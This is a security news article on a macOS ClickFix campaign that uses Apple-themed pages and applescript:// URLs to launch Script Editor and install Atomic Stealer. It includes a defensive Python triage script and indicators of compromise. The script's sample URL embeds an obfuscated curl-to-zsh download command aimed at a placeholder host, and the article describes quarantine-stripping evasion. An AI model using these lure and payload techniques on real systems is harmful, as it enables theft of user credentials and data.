ClickFix macOS Attack Strengthens Evasion Techniques by Leveraging Script Editor


A newly identified ClickFix-style macOS campaign shows threat actors refining their methods to sidestep security controls. Its defining change is the use of macOS Script Editor, rather than the Terminal, as the execution tool: detection and prevention logic that watches for commands pasted into Terminal never sees a script run from Script Editor.

The shift is notable because it keeps the familiar ClickFix social engineering lure and changes only how the malicious command reaches a shell. Routing execution through Script Editor sidesteps the Terminal-focused protections Apple has added and uses a path that both users and security tools are less likely to scrutinize.

A Shift in ClickFix-Style macOS Attack Techniques

Historically, ClickFix campaigns have relied on social engineering that tricks users into copying and pasting malicious commands into the Terminal, disguised as routine maintenance or troubleshooting steps. The newly discovered ClickFix-style macOS attack keeps the lure but drops the Terminal entirely.

Instead, attackers now use macOS Script Editor as the execution vector. Script Editor has been abused for malware delivery before, but pairing it with a browser-triggered workflow is a new step. The chain starts on a convincing Apple-themed webpage that leads the user into running the script.

Jamf researchers note that Apple tried to counter Terminal-based abuse in macOS 26.4 with a feature that inspects pasted commands before they run. That adds friction for the Terminal variant, but attackers have adapted by moving to a different tool, the usual cat-and-mouse dynamic in cybersecurity.

The Role of the Apple-Themed Webpage

The attack commences with a well-crafted Apple-themed webpage that mimics an official support page titled “Reclaim disk space on your Mac.” This page provides step-by-step instructions that closely resemble legitimate system maintenance guidance.

Users are prompted to run a "cleanup script" to free up storage space. Clicking the page's "Execute" button navigates the browser to an applescript:// URL, a custom URL scheme handled by Script Editor, which starts the next phase of the attack.

This mechanism introduces several key differences from traditional ClickFix campaigns:

  • The browser invokes the applescript:// URL scheme.
  • Users are prompted to use Script Editor to open the script.
  • A pre-filled script automatically appears within macOS Script Editor.
  • The user is encouraged to execute the script.

This workflow reduces the need for manual input, making the attack smoother and potentially more convincing.
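As an added example (not code from the campaign, from Jamf, or from the original article), the following Python parses an applescript:// URL captured from a proxy log or a page's HTML, recovers the script that Script Editor would pre-fill, and flags the constructs an analyst should look at first. It assumes the URL takes the form Script Editor's handler accepts, applescript://com.apple.scripteditor?action=new&script=<percent-encoded text>; the sample URL and the script embedded in it are constructed for the example, with a placeholder host, and are not indicators from the campaign.

```python
"""Triage an applescript:// URL of the kind a ClickFix page sends the browser to.

Added example, not the campaign's or Jamf's code. Assumed URL shape:
applescript://com.apple.scripteditor?action=new&script=<percent-encoded script>
SAMPLE_URL below is constructed for the example (placeholder host, no real IoC).
"""
import re
from urllib.parse import unquote, urlsplit

# Constructed sample: a "cleanup" dialog wrapped around a hidden shell command.
SAMPLE_URL = (
    "applescript://com.apple.scripteditor?action=new&script="
    "display%20dialog%20%22Cleaning%20up%20disk%20space...%22%0A"
    "do%20shell%20script%20%22curl%20-fsk%20%24(echo%20'uggcf%3A%2F%2Frknzcyr.vainyvq%2Ffntgr'"
    "%20%7C%20tr%20'A-Za-z'%20'N-ZA-Mn-za-m')%20%7C%20zsh%22"
)

# Constructs worth a second look in a script that a web page handed to Script Editor.
SHELL_PATTERNS = {
    "do shell script": r"do\s+shell\s+script",
    "curl -k (TLS validation disabled)": r"\bcurl\b[^|\n]*\s-[A-Za-z]*k\b",
    "pipe into a shell": r"\|\s*(?:zsh|bash|sh)\b",
    "tr-based decoding": r"\btr\s+'[^']*'\s+'[^']*'",
}

def parse_applescript_url(url: str) -> dict:
    """Split the URL into handler host and percent-decoded query parameters.

    Values are decoded with unquote(), not parse_qs(), so a literal '+' in the
    script survives instead of becoming a space; pairs are split on '&' before
    decoding, so an encoded '&' (%26) inside the script does not break the parse.
    """
    parts = urlsplit(url)
    if parts.scheme.lower() != "applescript":
        raise ValueError(f"not an applescript:// URL: {url[:40]!r}")
    params = {}
    for pair in parts.query.split("&"):
        if pair:
            key, _, value = pair.partition("=")
            params[unquote(key)] = unquote(value)
    return {"host": parts.netloc, "params": params}

def extract_shell_commands(script: str) -> list:
    """Return the string argument of every `do shell script "..."` in the AppleScript."""
    return [m.group(1) for m in
            re.finditer(r'do\s+shell\s+script\s+"((?:[^"\\]|\\.)*)"', script)]

def triage(url: str) -> dict:
    """Decode the URL and summarise what the pre-filled script would do."""
    info = parse_applescript_url(url)
    script = info["params"].get("script", "")
    return {
        "handler": info["host"],
        "action": info["params"].get("action"),
        "script": script,
        "shell_commands": extract_shell_commands(script),
        "flags": [name for name, pat in SHELL_PATTERNS.items() if re.search(pat, script)],
    }

if __name__ == "__main__":
    result = triage(SAMPLE_URL)
    print(result["script"])
    print("flags:", ", ".join(result["flags"]))
```

The pattern list is deliberately narrow: a `do shell script` that pipes `curl -k` output into a shell, or that decodes a string with `tr`, is what separates this lure from a genuine maintenance script, and those are the strings a proxy or EDR rule can key on.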

Execution Flow and Obfuscation

Once inside macOS Script Editor, the user is presented with a script that appears to perform legitimate cleanup operations. However, behind the scenes, the script executes an obfuscated shell command.

The command employs string manipulation via the tr utility to decode a hidden URL at runtime. Once decoded, it resolves to a remote server hosting the malicious payload. The command follows a familiar structure:

  • Obfuscation: Encoded strings are transformed into valid URLs.
  • Payload retrieval: A curl request fetches remote content, with the -k flag disabling TLS certificate validation.
  • Execution: The downloaded content is piped straight into zsh, so the first-stage script runs without ever being written to disk.

If the fetch succeeds, this step delivers a second-stage script that is itself wrapped in base64 encoding and gzip compression.

Second-Stage Payload and Atomic Stealer

After decoding, the second-stage script downloads a Mach-O executable file to the /tmp directory. The script performs several actions:

  • Downloads the binary from a remote server.
  • Removes the file's extended attributes, which discards the com.apple.quarantine flag that would otherwise cause Gatekeeper to assess the unsigned download.
  • Assigns execution permissions.
  • Executes the binary.

The final payload has been identified as a variant of Atomic Stealer, an infostealer known for targeting sensitive user data. This staged delivery method allows attackers to keep the initial script small and less detectable while reserving the primary malicious functionality for later execution.

Behavior Across macOS Versions

The behavior of macOS Script Editor during this attack varies depending on the operating system version. On macOS 26.0, the script opens directly, allowing immediate execution. However, macOS 26.4 introduces additional safeguards.

In newer versions, users receive a warning indicating that the script originates from an unidentified developer. They must explicitly permit the creation and execution of the script document, adding another layer of user interaction. Despite this, the attack remains effective if users follow the prompts, emphasizing the continued efficacy of social engineering tactics.

Indicators of Compromise

Researchers have identified several indicators associated with this ClickFix-style macOS attack:

  • Domain: dryvecar[.]com (linked to the infostealer payload)
  • Malicious webpages:
    • storage-fixes.squarespace[.]com
    • cleanupmac.mssg[.]me
  • File: helper (Mach-O executable)
  • SHA256: 3d3c91ee762668c85b74859e4d09a2adfd34841694493b82659fda77fe0c2c44

These indicators can assist security teams in detecting and responding to related threats.

Source: thecyberexpress.com
